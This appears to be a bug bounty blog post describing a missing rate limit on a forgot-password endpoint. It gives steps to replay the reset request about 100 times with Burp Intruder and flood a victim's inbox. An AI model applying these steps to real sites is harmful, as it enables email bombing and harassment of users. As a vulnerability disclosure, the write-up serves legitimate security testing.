$500 For No Rate Limit On Forgot Password Page


A little bit about Rate Limit:
A rate limiting algorithm is used to check if the user session (or IP-address) has to be limited based on the information in the session cache.
In case a client made too many requests within a given time frame, HTTP-Servers can respond with status code 429: Too Many Requests

Steps To Reproduce The Issue

Step 1- Go To This Link www.example.com

Enter Email Click On Forget Password

Step 2- Intercept This Request In Burp And Forward Till You Found YOur Number In Request Like (“email”:your email here”)

POST /api/v1/users/password/remind HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/lost-password
Content-Type: application/json
X-CSRF-TOKEN: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Origin: https://example.com
Content-Length: 33
Connection: close
Cookie: __cfduid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

(“email”;”your email here”)

Step 3- Now Send This Request To Intruder And Repeat It 100 Time By Fixing Any Arbitrary Payload Which Doesn’t No Effect Request I Choose Accept-Language: en-US,en;q=0.$5$

Step 4 — See You Will Get 200 ok Status Code & 100 + Email In Your INBOX
See It Is Resulting In Mass Mailing Or Email Bombing To Your Users Which Is Bad For Business Impact

Thank you for reading Follow for more





Bug Bounty Hunter

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Space Invaders from Scratch — Part 2

Python for Artificial Intelligence: 10 Reasons Why You Should Use It

Writing skills for Echo Show

Deploying Microservices with AWS Fargate

Super Smash Brothers CLI Project

A User Centered Engineering Journey to Escape GoPro’s Software Shackles

CI/CD fit for the Air Force: Hope for the Best or Prepare for the Worst?

Guideline for FAANG

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Bug Bounty Hunter

More from Medium

No Rate Limiting on OTP sending

Extreme Hacking Mindset

Exploiting CVE-2019–5418- File Content Disclosure on Rails

Bypassing CSRF token protection by abusing a misconfigured CORS policy